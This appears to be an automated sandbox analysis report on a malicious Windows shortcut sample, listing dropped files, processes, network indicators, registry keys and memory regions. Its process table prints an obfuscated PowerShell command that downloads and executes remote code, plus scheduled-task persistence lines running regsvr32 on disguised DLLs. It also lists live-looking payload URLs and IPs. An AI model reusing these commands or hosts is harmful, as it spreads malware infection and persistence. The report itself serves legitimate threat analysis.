Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
fBcMVl6ns6.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=19,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\Public\ajbs50ul.bat
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Gga6.ini
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\M08e.ini
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\utox_x86_x64.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeczgi43.tht.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2ctgb41.zc3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnkewsjx.th4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbrff2b0.uox.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbspg2wm.obn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktt01nkr.xq1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kus2hrfz.ini.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqge4sys.ry3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzuodjf0.zc1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\second_data_temp.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\tox_save.tox
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\utox_save.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\utox_save.in~
|
Generic INItialization configuration [interface]
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl
syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'',
''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'',
''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
|
||
C:\Users\Public\ajbs50ul.bat
|
"C:\Users\Public\ajbs50ul.bat"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\")
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName
'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
|
||
C:\Users\user\Desktop\utox_x86_x64.exe
|
"C:\Users\user\Desktop\utox_x86_x64.exe"
|
||
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
|
||
C:\Windows\System32\OpenWith.exe
|
"C:\Windows\system32\openwith.exe"
|
||
C:\Windows\System32\regsvr32.exe
|
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
|
||
C:\Windows\System32\rekeywiz.exe
|
"C:\Windows\system32\rekeywiz.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\")
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName
'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
|
||
C:\Program Files\Windows Media Player\wmprph.exe
|
"C:\Program Files\Windows Media Player\wmprph.exe"
|
||
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
|
||
C:\Windows\System32\dllhost.exe
|
"C:\Windows\system32\dllhost.exe"
|
||
C:\Windows\System32\rekeywiz.exe
|
"C:\Windows\system32\rekeywiz.exe"
|
||
C:\Windows\System32\regsvr32.exe
|
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://go.micro
|
unknown
|
||
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
|
|||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.microsoft.w
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://1h982d.bemostake.space
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://1h982d.bp24mostakp24.spacp24/tp24st.txt
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://rocketdocs.lol/utox_x86.exe
|
188.114.97.3
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://rocketdocs.lol
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
|
188.114.96.3
|
||
http://rocketdocs.lol
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://www.microsoft.$
|
unknown
|
||
http://bemostake.space
|
unknown
|
||
https://bemostake.space
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://1h982d.bemostake.space/test.txt
|
188.114.96.3
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
http://1h982d.bemostake.space
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bemostake.space
|
188.114.96.3
|
||
1h982d.bemostake.space
|
188.114.96.3
|
||
rocketdocs.lol
|
188.114.97.3
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.8
|
unknown
|
unknown
|
||
46.29.238.96
|
unknown
|
Russian Federation
|
||
147.45.126.71
|
unknown
|
Russian Federation
|
||
104.223.122.15
|
unknown
|
United States
|
||
185.196.9.174
|
unknown
|
Switzerland
|
||
195.93.190.6
|
unknown
|
Ukraine
|
||
148.251.23.146
|
unknown
|
Germany
|
||
104.233.104.126
|
unknown
|
Saudi Arabia
|
||
192.168.2.7
|
unknown
|
unknown
|
||
163.172.136.118
|
unknown
|
United Kingdom
|
||
192.168.2.9
|
unknown
|
unknown
|
||
95.215.44.78
|
unknown
|
Latvia
|
||
193.124.186.205
|
unknown
|
Russian Federation
|
||
192.168.2.5
|
unknown
|
unknown
|
||
8.8.8.8
|
unknown
|
United States
|
||
37.97.185.116
|
unknown
|
Netherlands
|
||
130.133.110.14
|
unknown
|
Germany
|
||
194.249.212.109
|
unknown
|
Slovenia
|
||
136.243.141.187
|
unknown
|
Germany
|
||
37.187.122.30
|
unknown
|
France
|
||
185.14.30.213
|
unknown
|
Ukraine
|
||
185.58.206.164
|
unknown
|
Russian Federation
|
||
51.254.84.212
|
unknown
|
France
|
||
80.87.193.193
|
unknown
|
Russian Federation
|
||
46.229.52.198
|
unknown
|
Ukraine
|
||
188.114.97.3
|
rocketdocs.lol
|
European Union
|
||
205.185.116.116
|
unknown
|
United States
|
||
85.21.144.224
|
unknown
|
Russian Federation
|
||
85.130.224.235
|
unknown
|
Israel
|
||
188.114.96.3
|
bemostake.space
|
European Union
|
||
192.168.2.255
|
unknown
|
unknown
|
||
198.98.51.198
|
unknown
|
United States
|
There are 22 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
|
Version
|
||
HKEY_CURRENT_USER\SOFTWARE\SibCode
|
sn2
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1BA01000
|
direct allocation
|
page execute and read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9DF920000
|
direct allocation
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
28D0000
|
direct allocation
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0C91000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1F9E0D8D000
|
heap
|
page read and write
|
||
1B6F3000
|
trusted library allocation
|
page read and write
|
||
2403AAD9000
|
heap
|
page read and write
|
||
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
10B5000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F9DE0A8000
|
heap
|
page read and write
|
||
1BDC2DC9000
|
heap
|
page read and write
|
||
1F3DAC0B000
|
heap
|
page read and write
|
||
872BB3C000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1B400000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
8AC2BFE000
|
stack
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
231A8AC5000
|
heap
|
page read and write
|
||
1F9DE0AF000
|
heap
|
page read and write
|
||
7FF63D220000
|
unkown
|
page readonly
|
||
7FFB4B670000
|
trusted library allocation
|
page read and write
|
||
1C340000
|
trusted library allocation
|
page read and write
|
||
1C3B0000
|
trusted library allocation
|
page read and write
|
||
7FFBAA430000
|
unkown
|
page readonly
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C3D0000
|
trusted library allocation
|
page read and write
|
||
D85000
|
heap
|
page read and write
|
||
1C3E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B264000
|
trusted library allocation
|
page read and write
|
||
1F9E07E6000
|
unkown
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3F4C77000
|
heap
|
page execute and read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1BF1A000
|
stack
|
page read and write
|
||
1F3F523E000
|
heap
|
page read and write
|
||
1F9E0411000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
24D91250000
|
remote allocation
|
page execute and read and write
|
||
231A88D8000
|
heap
|
page read and write
|
||
1B4D0000
|
trusted library allocation
|
page read and write
|
||
1F9E043B000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
24023D51000
|
trusted library allocation
|
page read and write
|
||
1C415000
|
trusted library allocation
|
page read and write
|
||
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
1BDC6805000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0237000
|
heap
|
page read and write
|
||
7FF63D2DB000
|
unkown
|
page write copy
|
||
54CE000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E0411000
|
heap
|
page read and write
|
||
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B558000
|
heap
|
page read and write
|
||
27B3000
|
trusted library allocation
|
page read and write
|
||
1B413000
|
trusted library allocation
|
page read and write
|
||
1BDC4A30000
|
heap
|
page read and write
|
||
1C330000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1BE55000
|
trusted library allocation
|
page read and write
|
||
1B750000
|
trusted library allocation
|
page read and write
|
||
57FF000
|
stack
|
page read and write
|
||
1F9E06C3000
|
heap
|
page read and write
|
||
1BDC6118000
|
trusted library allocation
|
page read and write
|
||
DC1000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1BDC3035000
|
heap
|
page read and write
|
||
1B590000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
24D91490000
|
heap
|
page read and write
|
||
2403A7A3000
|
heap
|
page read and write
|
||
5499000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1B307000
|
trusted library allocation
|
page read and write
|
||
22130921000
|
heap
|
page read and write
|
||
1BDB0000
|
trusted library allocation
|
page read and write
|
||
E4E000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
7FFB4B540000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
D3C000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
20EE000
|
stack
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1C0A3000
|
trusted library allocation
|
page read and write
|
||
130F000
|
stack
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2E5F000
|
trusted library allocation
|
page read and write
|
||
1F9E0352000
|
heap
|
page read and write
|
||
BF082FE000
|
stack
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BFDB000
|
stack
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
1B54C000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B4A0000
|
trusted library allocation
|
page read and write
|
||
2403AE19000
|
heap
|
page read and write
|
||
231A88D0000
|
heap
|
page read and write
|
||
7FFB4B440000
|
trusted library allocation
|
page execute and read and write
|
||
3C0367E000
|
stack
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
539D000
|
heap
|
page read and write
|
||
231A8AC0000
|
heap
|
page read and write
|
||
1F3DAC0D000
|
heap
|
page read and write
|
||
1F9E044B000
|
heap
|
page read and write
|
||
1C430000
|
trusted library allocation
|
page read and write
|
||
1F9E0D01000
|
heap
|
page read and write
|
||
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
26F0000
|
heap
|
page execute and read and write
|
||
1F3F4B65000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1C530000
|
trusted library allocation
|
page read and write
|
||
7DF43B4F6000
|
unkown
|
page read and write
|
||
7FFB4B326000
|
trusted library allocation
|
page execute and read and write
|
||
1AA3FF10000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0358000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B445000
|
trusted library allocation
|
page read and write
|
||
1B5BD000
|
heap
|
page read and write
|
||
1BD89000
|
trusted library allocation
|
page read and write
|
||
2733000
|
trusted library allocation
|
page read and write
|
||
1C450000
|
trusted library allocation
|
page read and write
|
||
7FF63D3FC000
|
unkown
|
page write copy
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1B4C0000
|
trusted library allocation
|
page read and write
|
||
C10000
|
heap
|
page read and write
|
||
1BDC2DC1000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0660000
|
unkown
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E045E000
|
heap
|
page read and write
|
||
1B320000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1BD70000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
35EF000
|
stack
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
2403AB4A000
|
heap
|
page read and write
|
||
240325A3000
|
trusted library allocation
|
page read and write
|
||
1BD81000
|
trusted library allocation
|
page read and write
|
||
1C50D000
|
trusted library allocation
|
page read and write
|
||
1F9E042E000
|
heap
|
page read and write
|
||
1F3DABFE000
|
heap
|
page read and write
|
||
7C8000
|
heap
|
page read and write
|
||
1C590000
|
trusted library allocation
|
page read and write
|
||
3C03877000
|
stack
|
page read and write
|
||
1BEE0000
|
trusted library allocation
|
page read and write
|
||
2207000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BF50000
|
trusted library allocation
|
page read and write
|
||
1B170000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7DD000
|
heap
|
page read and write
|
||
7FFB4B5A3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1AA41F40000
|
heap
|
page read and write
|
||
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BE63000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1BDC612B000
|
trusted library allocation
|
page read and write
|
||
7FFB4B540000
|
trusted library allocation
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AA419CA000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
26E0000
|
trusted library allocation
|
page read and write
|
||
1AA3FFD1000
|
heap
|
page read and write
|
||
27B0000
|
trusted library allocation
|
page read and write
|
||
DB0000
|
heap
|
page readonly
|
||
5392000
|
heap
|
page read and write
|
||
1BE55000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
6A7000
|
unkown
|
page readonly
|
||
1B5C6000
|
heap
|
page read and write
|
||
7FFB4B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1C570000
|
trusted library allocation
|
page read and write
|
||
1F3DAC4B000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
2403A8A6000
|
heap
|
page execute and read and write
|
||
1C1D0000
|
trusted library allocation
|
page read and write
|
||
1F3F4F08000
|
heap
|
page read and write
|
||
240224C3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B2D0000
|
trusted library section
|
page read and write
|
||
3C035FD000
|
stack
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0F0F000
|
heap
|
page read and write
|
||
7FFB4B560000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1344000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
1B230000
|
heap
|
page read and write
|
||
1B808000
|
heap
|
page read and write
|
||
1B5C4000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B316000
|
trusted library allocation
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
1B6D0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B28D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1AA41981000
|
heap
|
page read and write
|
||
7FFB4B500000
|
trusted library allocation
|
page read and write
|
||
